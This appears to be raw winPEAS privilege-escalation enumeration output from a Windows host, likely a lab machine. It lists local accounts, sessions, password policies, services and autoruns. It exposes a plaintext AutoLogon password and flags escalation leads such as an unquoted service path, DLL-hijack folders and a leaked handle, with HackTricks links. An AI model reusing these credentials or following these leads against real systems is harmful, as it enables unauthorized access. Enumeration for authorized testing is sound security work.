Password Last Set : 6/12/2020 11:22:11 AM
=================================================================================================
Computer Name : SET
User Name : KellyJen
User Id : 2049
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:18 AM
=================================================================================================
Computer Name : SET
User Name : KittyMar
User Id : 2044
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:17 AM
=================================================================================================
Computer Name : SET
User Name : KristinFre
User Id : 2026
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:15 AM
=================================================================================================
Computer Name : SET
User Name : LeahBur
User Id : 2033
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:16 AM
=================================================================================================
Computer Name : SET
User Name : LeahLar
User Id : 2060
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:19 AM
=================================================================================================
Computer Name : SET
User Name : LenaMoo
User Id : 2075
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:22 AM
=================================================================================================
Computer Name : SET
User Name : LesaRog
User Id : 2092
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:24 AM
=================================================================================================
Computer Name : SET
User Name : MaeGut
User Id : 2071
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:21 AM
=================================================================================================
Computer Name : SET
User Name : MarjorieAda
User Id : 2036
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:16 AM
=================================================================================================
Computer Name : SET
User Name : MasonMor
User Id : 2096
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:25 AM
=================================================================================================
Computer Name : SET
User Name : MaxDou
User Id : 2035
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:16 AM
=================================================================================================
Computer Name : SET
User Name : MeghanCha
User Id : 2023
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:14 AM
=================================================================================================
Computer Name : SET
User Name : MeghanHol
User Id : 1984
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:08 AM
=================================================================================================
Computer Name : SET
User Name : MichelleWat
User Id : 2014
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/2/2023 9:46:46 AM
Logons Count : 22
Password Last Set : 6/15/2020 9:57:14 AM
=================================================================================================
Computer Name : SET
User Name : MiriamWar
User Id : 2053
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:18 AM
=================================================================================================
Computer Name : SET
User Name : MyrtleOwe
User Id : 2041
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/2/2023 9:23:37 AM
Logons Count : 1
Password Last Set : 6/16/2020 11:53:51 AM
=================================================================================================
Computer Name : SET
User Name : NatalieArm
User Id : 2076
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:22 AM
=================================================================================================
Computer Name : SET
User Name : NataliePen
User Id : 2093
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:25 AM
=================================================================================================
Computer Name : SET
User Name : NathanielMar
User Id : 2078
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:22 AM
=================================================================================================
Computer Name : SET
User Name : NicholasRam
User Id : 2067
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:20 AM
=================================================================================================
Computer Name : SET
User Name : NormanAnd
User Id : 2042
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:17 AM
=================================================================================================
Computer Name : SET
User Name : NormanTur
User Id : 2072
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:21 AM
=================================================================================================
Computer Name : SET
User Name : One
User Id : 1001
Is Enabled : True
User Type : Administrator
Comment :
Last Logon : 1/2/2023 6:45:58 AM
Logons Count : 23
Password Last Set : 6/7/2020 6:56:25 AM
=================================================================================================
Computer Name : SET
User Name : OwenKel
User Id : 2064
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:20 AM
=================================================================================================
Computer Name : SET
User Name : PamelaGre
User Id : 2024
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:14 AM
=================================================================================================
Computer Name : SET
User Name : PeggyHal
User Id : 1993
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:10 AM
=================================================================================================
Computer Name : SET
User Name : PennyRay
User Id : 2062
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:20 AM
=================================================================================================
Computer Name : SET
User Name : PeytonJam
User Id : 2007
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:12 AM
=================================================================================================
Computer Name : SET
User Name : PhyllisRic
User Id : 2068
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:21 AM
=================================================================================================
Computer Name : SET
User Name : PriscillaNew
User Id : 2013
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:13 AM
=================================================================================================
Computer Name : SET
User Name : RandyGre
User Id : 1999
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:11 AM
=================================================================================================
Computer Name : SET
User Name : ReneeLuc
User Id : 1992
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:10 AM
=================================================================================================
Computer Name : SET
User Name : RickyRee
User Id : 2010
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:12 AM
=================================================================================================
Computer Name : SET
User Name : RobertaPhi
User Id : 1986
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:09 AM
=================================================================================================
Computer Name : SET
User Name : RodneyHen
User Id : 2057
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:19 AM
=================================================================================================
Computer Name : SET
User Name : RogerMey
User Id : 2061
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:19 AM
=================================================================================================
Computer Name : SET
User Name : RosemaryWes
User Id : 2070
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:21 AM
=================================================================================================
Computer Name : SET
User Name : RoseNew
User Id : 2055
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:19 AM
=================================================================================================
Computer Name : SET
User Name : RossPow
User Id : 2046
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:17 AM
=================================================================================================
Computer Name : SET
User Name : RoyMas
User Id : 2000
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:11 AM
=================================================================================================
Computer Name : SET
User Name : RubenSch
User Id : 1990
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:09 AM
=================================================================================================
Computer Name : SET
User Name : SallyHan
User Id : 2063
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:20 AM
=================================================================================================
Computer Name : SET
User Name : SallyOrt
User Id : 2079
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:22 AM
=================================================================================================
Computer Name : SET
User Name : SallySte
User Id : 2043
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:17 AM
=================================================================================================
Computer Name : SET
User Name : SalvadorLee
User Id : 1983
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:08 AM
=================================================================================================
Computer Name : SET
User Name : SethHic
User Id : 2029
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:15 AM
=================================================================================================
Computer Name : SET
User Name : SohamKel
User Id : 2003
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:11 AM
=================================================================================================
Computer Name : SET
User Name : SohamTuc
User Id : 2034
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:16 AM
=================================================================================================
Computer Name : SET
User Name : SophiaBoy
User Id : 2069
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:21 AM
=================================================================================================
Computer Name : SET
User Name : StephanieRey
User Id : 2028
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:15 AM
=================================================================================================
Computer Name : SET
User Name : SusanSta
User Id : 2011
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:13 AM
=================================================================================================
Computer Name : SET
User Name : TammyJoh
User Id : 2015
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:13 AM
=================================================================================================
Computer Name : SET
User Name : ThomasWeb
User Id : 1980
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:08 AM
=================================================================================================
Computer Name : SET
User Name : TomAnd
User Id : 2077
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:22 AM
=================================================================================================
Computer Name : SET
User Name : VeraNic
User Id : 2074
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:22 AM
=================================================================================================
Computer Name : SET
User Name : VivanGar
User Id : 1995
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:10 AM
=================================================================================================
Computer Name : SET
User Name : WadeRey
User Id : 2054
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:18 AM
=================================================================================================
Computer Name : SET
User Name : WalterPal
User Id : 1988
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:09 AM
=================================================================================================
Computer Name : SET
User Name : WayneWoo
User Id : 2083
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:23 AM
=================================================================================================
Computer Name : SET
User Name : WDAGUtilityAccount
User Id : 504
Is Enabled : False
User Type : Guest
Comment : A user account managed and used by the system for Windows Defender Application Guard scenarios.
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/7/2020 10:59:51 AM
=================================================================================================
Computer Name : SET
User Name : WendyRob
User Id : 2065
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:20 AM
=================================================================================================
Computer Name : SET
User Name : WyattWhe
User Id : 2022
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:14 AM
=================================================================================================
Computer Name : SET
User Name : ZackSul
User Id : 1998
Is Enabled : True
User Type : Guest
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 6/12/2020 11:22:10 AM
=================================================================================================
ÉÍÍÍÍÍÍÍÍÍ͹ RDP Sessions
SessID pSessionName pUserName pDomainName State SourceIP
1 Console MichelleWat SET Active
ÉÍÍÍÍÍÍÍÍÍ͹ Ever logged users
[X] Exception: Access denied
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Home folders found
C:\Users\Administrator
C:\Users\All Users
C:\Users\Default
C:\Users\Default User
C:\Users\MichelleWat : MichelleWat [AllAccess]
C:\Users\MyrtleOwe
C:\Users\One
C:\Users\Public
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultUserName : MichelleWat
DefaultPassword : !!!MICKEYmouse
ÉÍÍÍÍÍÍÍÍÍ͹ Password Policies
È Check for a possible brute-force
Domain: Builtin
SID: S-1-5-32
MaxPasswordAge: 42.22:47:31.7437440
MinPasswordAge: 00:00:00
MinPasswordLength: 0
PasswordHistoryLength: 0
PasswordProperties: 0
=================================================================================================
Domain: SET
SID: S-1-5-21-2146754214-159084425-2869734154
MaxPasswordAge: 42.00:00:00
MinPasswordAge: 00:00:00
MinPasswordLength: 0
PasswordHistoryLength: 0
PasswordProperties: DOMAIN_PASSWORD_COMPLEX
=================================================================================================
ÉÍÍÍÍÍÍÍÍÍ͹ Print Logon Sessions
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Processes Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÉÍÍÍÍÍÍÍÍÍ͹ Vulnerable Leaked Handlers
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation
Handle: 1092(file)
Handle Owner: Pid is 3172(winPEASany_ofs) with owner: MichelleWat
Reason: TakeOwnership
File Path: \Windows\System32
File Owner: NT SERVICE\TrustedInstaller
=================================================================================================
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Services Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
[X] Exception: Cannot open Service Control Manager on computer '.'. This operation might require other privileges.
ÉÍÍÍÍÍÍÍÍÍ͹ Interesting Services -non Microsoft-
È Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
[X] Exception: Access denied
Amazon SSM Agent(Amazon SSM Agent)["C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"] - Manual
Amazon SSM Agent
=================================================================================================
@arcsas.inf,%arcsas_ServiceName%;Adaptec SAS/SATA-II RAID Storport's Miniport Driver(PMC-Sierra, Inc. - @arcsas.inf,%arcsas_ServiceName%;Adaptec SAS/SATA-II RAID Storport's Miniport Driver)[System32\drivers\arcsas.sys] - Boot
=================================================================================================
AWS Lite Guest Agent(Amazon Inc. - AWS Lite Guest Agent)[C:\Program Files\Amazon\XenTools\LiteAgent.exe] - Autoload - No quotes and Space detected
AWS Lite Guest Agent
=================================================================================================
@netbvbda.inf,%vbd_srv_desc%;QLogic Network Adapter VBD(QLogic Corporation - @netbvbda.inf,%vbd_srv_desc%;QLogic Network Adapter VBD)[System32\drivers\bxvbda.sys] - Boot
=================================================================================================
@bcmfn2.inf,%bcmfn2.SVCDESC%;bcmfn2 Service(Windows (R) Win 7 DDK provider - @bcmfn2.inf,%bcmfn2.SVCDESC%;bcmfn2 Service)[C:\windows\System32\drivers\bcmfn2.sys] - System
=================================================================================================
@bxfcoe.inf,%BXFCOE.SVCDESC%;QLogic FCoE Offload driver(QLogic Corporation - @bxfcoe.inf,%BXFCOE.SVCDESC%;QLogic FCoE Offload driver)[System32\drivers\bxfcoe.sys] - Boot
=================================================================================================
@bxois.inf,%BXOIS.SVCDESC%;QLogic Offload iSCSI Driver(QLogic Corporation - @bxois.inf,%BXOIS.SVCDESC%;QLogic Offload iSCSI Driver)[System32\drivers\bxois.sys] - Boot
=================================================================================================
@cht4vx64.inf,%cht4vbd.generic%;Chelsio Virtual Bus Driver(Chelsio Communications - @cht4vx64.inf,%cht4vbd.generic%;Chelsio Virtual Bus Driver)[C:\windows\System32\drivers\cht4vx64.sys] - System
=================================================================================================
@net1ix64.inf,%e1iExpress.Service.DispName%;Intel(R) PRO/1000 PCI Express Network Connection Driver I(Intel Corporation - @net1ix64.inf,%e1iExpress.Service.DispName%;Intel(R) PRO/1000 PCI Express Network Connection Driver I)[C:\windows\System32\drivers\e1i63x64.sys] - System
=================================================================================================
@netevbda.inf,%vbd_srv_desc%;QLogic 10 Gigabit Ethernet Adapter VBD(QLogic Corporation - @netevbda.inf,%vbd_srv_desc%;QLogic 10 Gigabit Ethernet Adapter VBD)[System32\drivers\evbda.sys] - Boot
=================================================================================================
@ialpssi_gpio.inf,%iaLPSSi_GPIO.SVCDESC%;Intel(R) Serial IO GPIO Controller Driver(Intel Corporation - @ialpssi_gpio.inf,%iaLPSSi_GPIO.SVCDESC%;Intel(R) Serial IO GPIO Controller Driver)[C:\windows\System32\drivers\iaLPSSi_GPIO.sys] - System
=================================================================================================
@ialpssi_i2c.inf,%iaLPSSi_I2C.SVCDESC%;Intel(R) Serial IO I2C Controller Driver(Intel Corporation - @ialpssi_i2c.inf,%iaLPSSi_I2C.SVCDESC%;Intel(R) Serial IO I2C Controller Driver)[C:\windows\System32\drivers\iaLPSSi_I2C.sys] - System
=================================================================================================
@iastorav.inf,%iaStorAVC.DeviceDesc%;Intel Chipset SATA RAID Controller(Intel Corporation - @iastorav.inf,%iaStorAVC.DeviceDesc%;Intel Chipset SATA RAID Controller)[System32\drivers\iaStorAVC.sys] - Boot
=================================================================================================
@iastorv.inf,%*PNP0600.DeviceDesc%;Intel RAID Controller Windows 7(Intel Corporation - @iastorv.inf,%*PNP0600.DeviceDesc%;Intel RAID Controller Windows 7)[System32\drivers\iaStorV.sys] - Boot
=================================================================================================
@mlx4_bus.inf,%Ibbus.ServiceDesc%;Mellanox InfiniBand Bus/AL (Filter Driver)(Mellanox - @mlx4_bus.inf,%Ibbus.ServiceDesc%;Mellanox InfiniBand Bus/AL (Filter Driver))[C:\windows\System32\drivers\ibbus.sys] - System
=================================================================================================
@mlx4_bus.inf,%MLX4BUS.ServiceDesc%;Mellanox ConnectX Bus Enumerator(Mellanox - @mlx4_bus.inf,%MLX4BUS.ServiceDesc%;Mellanox ConnectX Bus Enumerator)[C:\windows\System32\drivers\mlx4_bus.sys] - System
=================================================================================================
@mlx4_bus.inf,%ndfltr.ServiceDesc%;NetworkDirect Service(Mellanox - @mlx4_bus.inf,%ndfltr.ServiceDesc%;NetworkDirect Service)[C:\windows\System32\drivers\ndfltr.sys] - System
=================================================================================================
PsShutdown(PsShutdown)[C:\windows\PSSDNSVC.EXE] - System
=================================================================================================
@netqevbda.inf,%vbd_srv_desc%;QLogic FastLinQ Ethernet VBD(Cavium, Inc. - @netqevbda.inf,%vbd_srv_desc%;QLogic FastLinQ Ethernet VBD)[System32\drivers\qevbda.sys] - Boot
=================================================================================================
@qefcoe.inf,%QEFCOE.SVCDESC%;QLogic FCoE driver(Cavium, Inc. - @qefcoe.inf,%QEFCOE.SVCDESC%;QLogic FCoE driver)[System32\drivers\qefcoe.sys] - Boot
=================================================================================================
@qeois.inf,%QEOIS.SVCDESC%;QLogic 40G iSCSI Driver(QLogic Corporation - @qeois.inf,%QEOIS.SVCDESC%;QLogic 40G iSCSI Driver)[System32\drivers\qeois.sys] - Boot
=================================================================================================
@ql2300.inf,%ql2300i.DriverDesc%;QLogic Fibre Channel STOR Miniport Inbox Driver (wx64)(QLogic Corporation - @ql2300.inf,%ql2300i.DriverDesc%;QLogic Fibre Channel STOR Miniport Inbox Driver (wx64))[System32\drivers\ql2300i.sys] - Boot
=================================================================================================
@ql40xx2i.inf,%ql40xx2i.DriverDesc%;QLogic iSCSI Miniport Inbox Driver(QLogic Corporation - @ql40xx2i.inf,%ql40xx2i.DriverDesc%;QLogic iSCSI Miniport Inbox Driver)[System32\drivers\ql40xx2i.sys] - Boot
=================================================================================================
@qlfcoei.inf,%qlfcoei.DriverDesc%;QLogic [FCoE] STOR Miniport Inbox Driver (wx64)(QLogic Corporation - @qlfcoei.inf,%qlfcoei.DriverDesc%;QLogic [FCoE] STOR Miniport Inbox Driver (wx64))[System32\drivers\qlfcoei.sys] - Boot
=================================================================================================
OpenSSH Authentication Agent(OpenSSH Authentication Agent)[C:\windows\System32\OpenSSH\ssh-agent.exe] - Manual
Agent to hold private keys used for public key authentication.
=================================================================================================
@usbstor.inf,%USBSTOR.SvcDesc%;USB Mass Storage Driver(@usbstor.inf,%USBSTOR.SvcDesc%;USB Mass Storage Driver)[C:\windows\System32\drivers\USBSTOR.SYS] - System
=================================================================================================
@usbxhci.inf,%PCI\CC_0C0330.DeviceDesc%;USB xHCI Compliant Host Controller(@usbxhci.inf,%PCI\CC_0C0330.DeviceDesc%;USB xHCI Compliant Host Controller)[C:\windows\System32\drivers\USBXHCI.SYS] - System
=================================================================================================
Veeam ONE Agent(Veeam Software AG - Veeam ONE Agent)["C:\Program Files\Veeam\Veeam ONE\Veeam ONE Agent\Veeam.One.Agent.Service.exe" -id=3be6b89b-e6de-4e97-bcd4-5c14e9d97fc1] - Autoload - isDotNet
Enables remediation actions and communication between Veeam ONE and monitored Veeam Backup & Replication servers.
=================================================================================================
@oem2.inf,%loc.vmciServiceDisplayName%;VMware VMCI Bus Driver(VMware, Inc. - @oem2.inf,%loc.vmciServiceDisplayName%;VMware VMCI Bus Driver)[System32\drivers\vmci.sys] - Boot
=================================================================================================
@vstxraid.inf,%Driver.DeviceDesc%;VIA StorX Storage RAID Controller Windows Driver(VIA Corporation - @vstxraid.inf,%Driver.DeviceDesc%;VIA StorX Storage RAID Controller Windows Driver)[System32\drivers\vstxraid.sys] - Boot
=================================================================================================
@%SystemRoot%\System32\drivers\vwifibus.sys,-257(@%SystemRoot%\System32\drivers\vwifibus.sys,-257)[C:\windows\System32\drivers\vwifibus.sys] - System
@%SystemRoot%\System32\drivers\vwifibus.sys,-258
=================================================================================================
@mlx4_bus.inf,%WinMad.ServiceDesc%;WinMad Service(Mellanox - @mlx4_bus.inf,%WinMad.ServiceDesc%;WinMad Service)[C:\windows\System32\drivers\winmad.sys] - System
=================================================================================================
@winusb.inf,%WINUSB_SvcName%;WinUsb Driver(@winusb.inf,%WINUSB_SvcName%;WinUsb Driver)[C:\windows\System32\drivers\WinUSB.SYS] - System
@winusb.inf,%WINUSB_SvcDesc%;Generic driver for USB devices
=================================================================================================
@mlx4_bus.inf,%WinVerbs.ServiceDesc%;WinVerbs Service(Mellanox - @mlx4_bus.inf,%WinVerbs.ServiceDesc%;WinVerbs Service)[C:\windows\System32\drivers\winverbs.sys] - System
=================================================================================================
@oem3.inf,%XenBusName%;AWS PV Bus(Amazon Inc. - @oem3.inf,%XenBusName%;AWS PV Bus)[System32\drivers\xenbus.sys] - Boot
=================================================================================================
@oem3.inf,%XenFiltName%;AWS Bus Filter(Amazon Inc. - @oem3.inf,%XenFiltName%;AWS Bus Filter)[System32\drivers\xenfilt.sys] - Boot
=================================================================================================
@oem4.inf,%XenIfaceDevice.DeviceDesc%;AWS Interface(Amazon Inc. - @oem4.inf,%XenIfaceDevice.DeviceDesc%;AWS Interface)[C:\windows\System32\drivers\xeniface.sys] - System
=================================================================================================
@oem5.inf,%XenNetName%;AWS PV Network Device(Amazon Inc. - @oem5.inf,%XenNetName%;AWS PV Network Device)[C:\windows\System32\drivers\xennet.sys] - System
=================================================================================================
@oem6.inf,%XenVbdName%;AWS PV Storage Host Adapter(Amazon Inc. - @oem6.inf,%XenVbdName%;AWS PV Storage Host Adapter)[System32\drivers\xenvbd.sys] - Boot
=================================================================================================
@oem7.inf,%XenVifName%;AWS PV Network Class(Amazon Inc. - @oem7.inf,%XenVifName%;AWS PV Network Class)[C:\windows\System32\drivers\xenvif.sys] - System
=================================================================================================
ÉÍÍÍÍÍÍÍÍÍ͹ Modifiable Services
È Check if you can modify any service https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
You cannot modify any service
ÉÍÍÍÍÍÍÍÍÍ͹ Looking if you can modify any service registry
È Check if you can modify the registry of a service https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services-registry-permissions
[-] Looks like you cannot change the registry of any service...
ÉÍÍÍÍÍÍÍÍÍ͹ Checking write permissions in PATH folders (DLL Hijacking)
È Check for DLL Hijacking in PATH folders https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dll-hijacking
C:\windows\system32
C:\windows
C:\windows\System32\Wbem
C:\windows\System32\WindowsPowerShell\v1.0\
C:\windows\System32\OpenSSH\
C:\Program Files\Microsoft\Web Platform Installer\
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Applications Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÉÍÍÍÍÍÍÍÍÍ͹ Current Active Window Application
[X] Exception: Object reference not set to an instance of an object.
ÉÍÍÍÍÍÍÍÍÍ͹ Installed Applications --Via Program Files/Uninstall registry--
È Check if you can modify installed software https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#software
C:\Program Files\Amazon
C:\Program Files\Common Files
C:\Program Files\desktop.ini
C:\Program Files\internet explorer
C:\Program Files\Microsoft
C:\Program Files\Uninstall Information
C:\Program Files\Veeam
C:\Program Files\Windows Defender
C:\Program Files\Windows Defender Advanced Threat Protection
C:\Program Files\Windows Mail
C:\Program Files\Windows Media Player
C:\Program Files\Windows Multimedia Platform
C:\Program Files\windows nt
C:\Program Files\Windows Photo Viewer
C:\Program Files\Windows Portable Devices
C:\Program Files\Windows Security
C:\Program Files\Windows Sidebar
C:\Program Files\WindowsApps
C:\Program Files\WindowsPowerShell
ÉÍÍÍÍÍÍÍÍÍ͹ Autorun Applications
È Check if you can modify other users AutoRuns binaries (Note that is normal that you can modify HKCU registry and binaries indicated there) https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries
Error getting autoruns from WMIC: System.Management.ManagementException: Access denied
at System.Management.ThreadDispatch.Start()
at System.Management.ManagementScope.Initialize()
at System.Management.ManagementObjectSearcher.Initialize()
at System.Management.ManagementObjectSearcher.Get()
at hu.b()
RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Key: SecurityHealth
Folder: C:\windows\system32
File: C:\windows\system32\SecurityHealthSystray.exe
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Key: Common Startup
Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup (Unquoted and Space detected)
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Key: Common Startup
Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup (Unquoted and Space detected)
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Key: Userinit
Folder: C:\Windows\system32
